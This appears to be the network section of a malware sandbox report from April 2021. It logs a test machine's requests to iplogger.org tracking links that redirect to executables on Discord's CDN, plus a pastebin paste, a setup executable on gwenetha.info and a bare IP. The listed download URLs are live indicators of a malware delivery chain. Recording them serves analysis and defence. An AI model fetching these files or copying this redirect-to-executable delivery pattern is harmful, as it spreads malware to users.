Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
gwenetha.info | 172.67.131.232 | |
pastebin.com | 104.23.98.190 | |
iplogger.org | 88.99.66.31 | |
cdn.discordapp.com | 162.159.135.233 | |
whatitis.website | | |
TCP Requests
Source | Destination | Host |
---|---|---|
192.168.56.101:49208 | 104.21.12.27:443 | gwenetha.info |
192.168.56.101:49206 | 104.23.99.190:443 | pastebin.com |
192.168.56.101:49201 | 162.159.134.233:443 | cdn.discordapp.com |
192.168.56.101:49204 | 162.159.134.233:443 | cdn.discordapp.com |
192.168.56.101:49205 | 162.159.134.233:443 | cdn.discordapp.com |
192.168.56.101:49210 | 162.159.134.233:443 | cdn.discordapp.com |
192.168.56.101:49211 | 162.159.134.233:443 | cdn.discordapp.com |
192.168.56.101:49212 | 162.159.134.233:443 | cdn.discordapp.com |
192.168.56.101:49213 | 162.159.134.233:443 | cdn.discordapp.com |
192.168.56.101:49200 | 203.159.80.228:80 | |
192.168.56.101:49198 | 88.99.66.31:443 | iplogger.org |
192.168.56.101:49207 | 88.99.66.31:443 | iplogger.org |
192.168.56.101:49209 | 88.99.66.31:443 | iplogger.org |
UDP Requests
Source | Destination |
---|---|
192.168.56.101:54056 | 164.124.101.2:53 |
192.168.56.101:55450 | 164.124.101.2:53 |
192.168.56.101:59369 | 164.124.101.2:53 |
192.168.56.101:61479 | 164.124.101.2:53 |
192.168.56.101:62324 | 164.124.101.2:53 |
192.168.56.101:65329 | 164.124.101.2:53 |
192.168.56.101:137 | 192.168.56.255:137 |
192.168.56.101:138 | 192.168.56.255:138 |
192.168.56.101:49152 | 239.255.255.250:3702 |
192.168.56.101:59370 | 239.255.255.250:3702 |
192.168.56.101:62445 | 239.255.255.250:1900 |
192.168.56.101:62447 | 239.255.255.250:3702 |
52.231.114.183:123 | 192.168.56.101:123 |
8.8.8.8:53 | 192.168.56.101:62324 |
HTTP Requests
GET 200 https://iplogger.org/1hyTq7
GET /1hyTq7 HTTP/1.1
Host: iplogger.org
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 05 Apr 2021 04:25:30 GMT
Content-Type: image/png
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=hftadu0r6bpqgheht1k46cds16; path=/; HttpOnly
Pragma: no-cache
Set-Cookie: clhf03028ja=175.208.134.150; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=261451461; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Answers:
whoami: 2d939b5aee78649ba5dcf483ea0aaa5e19e86948b4778e339f04998c89927566
Strict-Transport-Security: max-age=31536000; preload
X-Frame-Options: DENY
GET 301 https://iplogger.org/2CQAB5.exe
GET /2CQAB5.exe HTTP/1.1
Host: iplogger.org
HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Mon, 05 Apr 2021 04:25:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=ea8q6vn2sr4haqt48l2s1sn1e7; path=/; HttpOnly
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: clhf03028ja=175.208.134.150; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=261451460; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Location: https://cdn.discordapp.com/attachments/826198252025675816/826537386485612574/china.png
Strict-Transport-Security: max-age=31536000; preload
X-Frame-Options: DENY
GET 200 https://cdn.discordapp.com/attachments/826198252025675816/826537386485612574/china.png
GET /attachments/826198252025675816/826537386485612574/china.png HTTP/1.1
Host: cdn.discordapp.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 05 Apr 2021 04:25:31 GMT
Content-Type: image/png
Content-Length: 7680
Connection: keep-alive
Set-Cookie: __cfduid=d418f44c446629ff9d18d62a2b13898e21617596731; expires=Wed, 05-May-21 04:25:31 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax
CF-Ray: 63b00355ef23a1d7-ICN
Accept-Ranges: bytes
Age: 451743
Cache-Control: public, max-age=31536000
ETag: "6be41709f8bfbf06307cc56d04249801"
Expires: Tue, 05 Apr 2022 04:25:31 GMT
Last-Modified: Tue, 30 Mar 2021 19:24:29 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
cf-request-id: 0941e069b40000a1d76c342000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
x-goog-generation: 1617132269285743
x-goog-hash: crc32c=aF03UA==
x-goog-hash: md5=a+QXCfi/vwYwfMVtBCSYAQ==
x-goog-metageneration: 1
x-goog-storage-class: STANDARD
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 7680
X-GUploader-UploadID: ABg5-UxiLDAZpR0Y2Z-4q6HmHSbdJu2Aw-itbIW-AA7MULcbcKMNQuhX9Jwm3JIVWTkUW9lL6Zi8VfeBlfDJSccdNIEhbl2dsA
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=2a3bwWSKeenm0yjTgCI23WmXLTFYgtOuCPO9bWS5OnkRK2QFpQfldH0PvNRXXfgkwvOZHo9Wq0nMStXFwbyncTEnxCX8kuvEEMlGNOjxxBgv%2Brg%3D"}],"group":"cf-nel"}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
GET 403 https://cdn.discordapp.com/attachments/822543417757270050/826145904716152872/PlayerUI.exe
GET /attachments/822543417757270050/826145904716152872/PlayerUI.exe HTTP/1.1
Referer: Microsoft Windows 7 Professional KN
User-Agent: test22@TEST22-PC
Host: cdn.discordapp.com
HTTP/1.1 403 Forbidden
Date: Mon, 05 Apr 2021 04:25:32 GMT
Content-Type: application/xml; charset=UTF-8
Content-Length: 223
Connection: keep-alive
Set-Cookie: __cfduid=df9681c8545da0e9d7c1b7380c8ee569a1617596732; expires=Wed, 05-May-21 04:25:32 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax
CF-Ray: 63b0035bcbeaa1d7-ICN
Age: 251
Cache-Control: private, max-age=0
Expires: Mon, 05 Apr 2021 04:21:21 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
cf-request-id: 0941e06d640000a1d78625b000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-GUploader-UploadID: ABg5-UyEcfuRjj12PlZUCc6KE9mMO6uetp0S0vSL8Hv8izJlj6yygUuPegLczrDr7bYTEeKW3givpJclAidA4t_50acdu_Dhew
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=wJzhjbQAWcX3PrtNXZ5OZyL53S%2Bhkck%2BD3gnMacjxpIgY5ueAQ9Hw9kKhS0%2FjfhZO4UdEUiDPS8EWuQH8b1ntHFqZS%2BHSR3IrabXfkT4z6xX6uE%3D"}],"group":"cf-nel"}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
GET 403 https://cdn.discordapp.com/attachments/822543417757270050/826145904716152872/PlayerUI.exe
GET /attachments/822543417757270050/826145904716152872/PlayerUI.exe HTTP/1.1
Referer: Microsoft Windows 7 Professional KN
User-Agent: test22@TEST22-PC
Host: cdn.discordapp.com
HTTP/1.1 403 Forbidden
Date: Mon, 05 Apr 2021 04:25:32 GMT
Content-Type: application/xml; charset=UTF-8
Content-Length: 223
Connection: keep-alive
Set-Cookie: __cfduid=d38d561ff7e2299bdfe1ab55dd3724d491617596732; expires=Wed, 05-May-21 04:25:32 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax
CF-Ray: 63b0035bdd2b12ca-ICN
Age: 251
Cache-Control: private, max-age=0
Expires: Mon, 05 Apr 2021 04:21:21 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
cf-request-id: 0941e06d69000012ca2c121000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-GUploader-UploadID: ABg5-UyEcfuRjj12PlZUCc6KE9mMO6uetp0S0vSL8Hv8izJlj6yygUuPegLczrDr7bYTEeKW3givpJclAidA4t_50acdu_Dhew
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=43%2Bhg4NocYzzU%2BezMNl2wUaRnhn6a4HGOX7QRCNIiWJDWvgglW2TbP1cI%2FzBKxAxXnXyAOqIxul6o8m%2FGPbNU9ElO8ld9rxi7emCp5ScWXSTjdU%3D"}],"max_age":604800,"group":"cf-nel"}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
GET 403 https://cdn.discordapp.com/attachments/822543417757270050/826145904716152872/PlayerUI.exe
GET /attachments/822543417757270050/826145904716152872/PlayerUI.exe HTTP/1.1
Referer: Microsoft Windows 7 Professional KN
User-Agent: test22@TEST22-PC
Host: cdn.discordapp.com
HTTP/1.1 403 Forbidden
Date: Mon, 05 Apr 2021 04:25:32 GMT
Content-Type: application/xml; charset=UTF-8
Content-Length: 223
Connection: keep-alive
Set-Cookie: __cfduid=d9f4c6891f37a3538cbea799cfc678a811617596732; expires=Wed, 05-May-21 04:25:32 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax
CF-Ray: 63b0035c3fa8a255-ICN
Age: 251
Cache-Control: private, max-age=0
Expires: Mon, 05 Apr 2021 04:21:21 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
cf-request-id: 0941e06da80000a2553481f000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-GUploader-UploadID: ABg5-UyEcfuRjj12PlZUCc6KE9mMO6uetp0S0vSL8Hv8izJlj6yygUuPegLczrDr7bYTEeKW3givpJclAidA4t_50acdu_Dhew
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=NJv3oU2x1NEPdPSRKZnbn9ecoFBAxAMWQCMXin6nea7qasGiGskkh5WQoTOGl5GVPkOFOtREYCNUMsykFJ%2BGAa1Shw0T0PIJxfmWaLSefgvzULQ%3D"}],"group":"cf-nel"}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
GET 200 https://iplogger.org/1iPtu7
GET /1iPtu7 HTTP/1.1
Host: iplogger.org
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 05 Apr 2021 04:25:46 GMT
Content-Type: image/png
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=lo0go5bg4i8o1rr5k1l9k47de5; path=/; HttpOnly
Pragma: no-cache
Set-Cookie: clhf03028ja=175.208.134.150; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=261451445; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Answers:
whoami: 2d939b5aee78649ba5dcf483ea0aaa5e19e86948b4778e339f04998c89927566
Strict-Transport-Security: max-age=31536000; preload
X-Frame-Options: DENY
GET 200 https://pastebin.com/raw/gCyjHCCH
GET /raw/gCyjHCCH HTTP/1.1
Host: pastebin.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 05 Apr 2021 04:25:46 GMT
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d1c4f73918199f017ecb5a835b24801191617596746; expires=Wed, 05-May-21 04:25:46 GMT; path=/; domain=.pastebin.com; HttpOnly; SameSite=Lax; Secure
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1;mode=block
cache-control: public, max-age=1801
CF-Cache-Status: HIT
Age: 251
cf-request-id: 0941e0a3e20000a1b33e14d000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Server: cloudflare
CF-RAY: 63b003b30a3da1b3-ICN
GET 404 https://gwenetha.info/setup-KGQJ-1.exe
GET /setup-KGQJ-1.exe HTTP/1.1
Host: gwenetha.info
Connection: Keep-Alive
HTTP/1.1 404 Not Found
Date: Mon, 05 Apr 2021 04:26:02 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 19
Connection: keep-alive
Set-Cookie: __cfduid=d63ca68974d4caa8e544e937606fa0fae1617596762; expires=Wed, 05-May-21 04:26:02 GMT; path=/; domain=.gwenetha.info; HttpOnly; SameSite=Lax
X-Content-Type-Options: nosniff
CF-Cache-Status: DYNAMIC
cf-request-id: 0941e0e1f3000056ddc7181000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=gmp422N4x%2BGY9FWWl9n9OpxvDB3143Jf2nnQ4MjEM%2BShoASAF%2F9u%2B4NcIFLorVOiOsBqoJJr3qs4RospqD30T3B2pRY0NIJDCnjBY6dr"}]}
NEL: {"max_age":604800,"report_to":"cf-nel"}
Server: cloudflare
CF-RAY: 63b00416596e56dd-LAX
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
GET 301 https://iplogger.org/2LehR6.exe
GET /2LehR6.exe HTTP/1.1
Host: iplogger.org
Connection: Keep-Alive
HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Mon, 05 Apr 2021 04:26:03 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=koaci7j3uo33ub43nphkes98l1; path=/; HttpOnly
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: clhf03028ja=175.208.134.150; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=261451428; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Location: https://cdn.discordapp.com/attachments/826416818390040589/826531006563352596/Bussed_2021-03-30_21-01.exe
Strict-Transport-Security: max-age=31536000; preload
X-Frame-Options: DENY
GET 200 https://cdn.discordapp.com/attachments/826416818390040589/826531006563352596/Bussed_2021-03-30_21-01.exe
GET /attachments/826416818390040589/826531006563352596/Bussed_2021-03-30_21-01.exe HTTP/1.1
Host: cdn.discordapp.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 05 Apr 2021 04:26:03 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=da99863055300a00834f52dbdfc31776d1617596763; expires=Wed, 05-May-21 04:26:03 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax
X-Frame-Options: SAMEORIGIN
cf-request-id: 0941e0e4b90000015432a17000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=wQC4Gamw5JJYPsHv2A2lc8%2B%2FcuxZFRQDmylqWqK82zcG7TjV5FbjPnIdp81UhSCOCELu8bJROh1e4n7P4M6BcRoBtYHYAOXGtngZaSolB9F67IQ%3D"}]}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 63b0041acffc0154-ICN
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
GET 200 https://cdn.discordapp.com/attachments/826416818390040589/826531006563352596/Bussed_2021-03-30_21-01.exe
GET /attachments/826416818390040589/826531006563352596/Bussed_2021-03-30_21-01.exe HTTP/1.1
Host: cdn.discordapp.com
HTTP/1.1 200 OK
Date: Mon, 05 Apr 2021 04:26:03 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=da99863055300a00834f52dbdfc31776d1617596763; expires=Wed, 05-May-21 04:26:03 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax
X-Frame-Options: SAMEORIGIN
cf-request-id: 0941e0e58c00000154c19c0000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=FXexFK%2B2LFkLOquUyE8ByjhRaYfL8pFgsYH9NOZfWtPzYhnuK0OLanVdqblUn7%2FwoLQc6bvtkocSRJy6ih3OmJi0f9kFgaXWVQAI1clBzs%2Bjm1A%3D"}]}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 63b0041c1a840154-ICN
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
GET 403 https://cdn.discordapp.com/attachments/826198252025675816/826538114838298715/install_setupVPSfree.exe
GET /attachments/826198252025675816/826538114838298715/install_setupVPSfree.exe HTTP/1.1
Host: cdn.discordapp.com
Connection: Keep-Alive
HTTP/1.1 403 Forbidden
Date: Mon, 05 Apr 2021 04:26:03 GMT
Content-Type: application/xml; charset=UTF-8
Content-Length: 223
Connection: keep-alive
Set-Cookie: __cfduid=d9ba7e51b22e501c4b3ba1b409c8b2ed41617596763; expires=Wed, 05-May-21 04:26:03 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax
CF-Ray: 63b0041c1a27e9ec-ICN
Age: 248
Cache-Control: private, max-age=0
Expires: Mon, 05 Apr 2021 04:21:55 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
cf-request-id: 0941e0e5900000e9ec25802000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-GUploader-UploadID: ABg5-Uy0DBZJ4PhYaAXNgHdhHtQPXr-fMEjb214k4lBMCsgfAwX3FQoZ4J4-MeRNNmimijjA9VnigLiWft_v8_ovP2E
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=WjZ80u2J3XNl6%2FP1KA8rBqSAaM64aej6o2FfdSM0J1SRvs5AKSCj9F5EqIrHt4tzBriee6n0Hkgi9ENv%2B1TFfXzcEhftdwSlpOEIZBmMyStAyNc%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"max_age":604800,"report_to":"cf-nel"}
Server: cloudflare
GET 403 https://cdn.discordapp.com/attachments/826416818390040589/826469949593485312/file.exe
GET /attachments/826416818390040589/826469949593485312/file.exe HTTP/1.1
Host: cdn.discordapp.com
HTTP/1.1 403 Forbidden
Date: Mon, 05 Apr 2021 04:26:07 GMT
Content-Type: application/xml; charset=UTF-8
Content-Length: 223
Connection: keep-alive
Set-Cookie: __cfduid=d73f16b7f4aa6b701f0343aa825a99d691617596767; expires=Wed, 05-May-21 04:26:07 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax
CF-Ray: 63b00431d89b0154-ICN
Age: 220
Cache-Control: private, max-age=0
Expires: Mon, 05 Apr 2021 04:22:27 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
cf-request-id: 0941e0f32300000154be805000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-GUploader-UploadID: ABg5-Uz26yCKX_mnm6Nq82REhI6Fx_B21T6sSzasO3o7WjHseapUVbZdAIUTBzRlptQQvF8aBJBvqa2sWRPCuaJyXZft1yNPFg
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=oog0b4TUzlGpVhjlB3zbCQWoksJ3HwgDpHjuYbPzXMsNQIt%2FudBPzFcDveeQB45YVmxoCyyyggCrs5%2B8R87FReVjDFPF1whcSnWOgW8s7%2BPatfE%3D"}]}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
GET 403 https://cdn.discordapp.com/attachments/826416818390040589/826855866228670474/7525b875715555.exe
GET /attachments/826416818390040589/826855866228670474/7525b875715555.exe HTTP/1.1
Host: cdn.discordapp.com
HTTP/1.1 403 Forbidden
Date: Mon, 05 Apr 2021 04:26:37 GMT
Content-Type: application/xml; charset=UTF-8
Content-Length: 223
Connection: keep-alive
Set-Cookie: __cfduid=d0c717e0f79a0dbc943755c9a3a6506d91617596797; expires=Wed, 05-May-21 04:26:37 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax
CF-Ray: 63b004f24cd5e9ec-ICN
Age: 282
Cache-Control: private, max-age=0
Expires: Mon, 05 Apr 2021 04:21:55 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
cf-request-id: 0941e16b6d0000e9ec6bb8c000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-GUploader-UploadID: ABg5-UyFfb0ju1UrZ8d3NVFfJE2mzlIJ6zA-jrpBc5Sed9FaHeB6-X5SNWuiJVWee-3nAVZmMLnfGcMql2KTa7C362jNEp-T7Q
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=EmBvHK68gn6Tp0%2F9kl8GKjdPcmWX5VrBXpyLwwoXHO0cDaW9y0o6%2FWS%2BM0qV0z9puD3Xy%2BRLgrp8XFQaV6VeIqqtrLqbHMlLTfRxa57Gz8DSdc4%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"max_age":604800,"report_to":"cf-nel"}
Server: cloudflare
GET 200 https://cdn.discordapp.com/attachments/826416818390040589/826540039764705360/7525b875713675d4ff0018cf084f493a4e4977de_2021-03-30_22-25.exe
GET /attachments/826416818390040589/826540039764705360/7525b875713675d4ff0018cf084f493a4e4977de_2021-03-30_22-25.exe HTTP/1.1
Host: cdn.discordapp.com
HTTP/1.1 200 OK
Date: Mon, 05 Apr 2021 04:26:43 GMT
Content-Type: application/x-msdos-program
Content-Length: 505856
Connection: keep-alive
Set-Cookie: __cfduid=d1007e0954b59ad67538551f4834607ed1617596803; expires=Wed, 05-May-21 04:26:43 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax
CF-Ray: 63b00514ffd1e9d8-ICN
Accept-Ranges: bytes
Age: 451812
Cache-Control: public, max-age=31536000
Content-Disposition: attachment;%20filename=7525b875713675d4ff0018cf084f493a4e4977de_2021-03-30_22-25.exe
ETag: "28345a7bb63babaf99e760965ce493b7"
Expires: Tue, 05 Apr 2022 04:26:43 GMT
Last-Modified: Tue, 30 Mar 2021 19:35:01 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
cf-request-id: 0941e1811f0000e9d8f122c000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
x-goog-generation: 1617132901889175
x-goog-hash: crc32c=Ws/4nQ==
x-goog-hash: md5=KDRae7Y7q6+Z52CWXOSTtw==
x-goog-metageneration: 1
x-goog-storage-class: STANDARD
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 505856
X-GUploader-UploadID: ABg5-UznZNO55X93AubXlWYP0c5SyYOTRHkzDJhcIzrcH58RoyWaPDs0j0jqBmhsS-QvB5VHDoqPplp1xtV5hwkr0kW8h3tVvw
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=G5GT%2FAxUTckhT3YFXuDJGfv9lB%2BIFedk9yOBCCdqfPEGxoMR1X3kg2iWH6DGTLgscp0s1elQiC12HNW%2Bhpqu%2FxQlRYQErrucNhUab6wYYg4pN9I%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
GET 200 http://203.159.80.228/
GET / HTTP/1.1
Host: 203.159.80.228
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 05 Apr 2021 04:25:31 GMT
Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/8.0.2
Last-Modified: Tue, 30 Mar 2021 16:04:04 GMT
ETag: "1f-5bec325bb5626"
Accept-Ranges: bytes
Content-Length: 31
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
ICMP traffic
Source | Destination | ICMP Type | Data |
---|---|---|---|
192.168.56.101 | 164.124.101.2 | 3 | |
IRC traffic
No IRC requests performed.
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts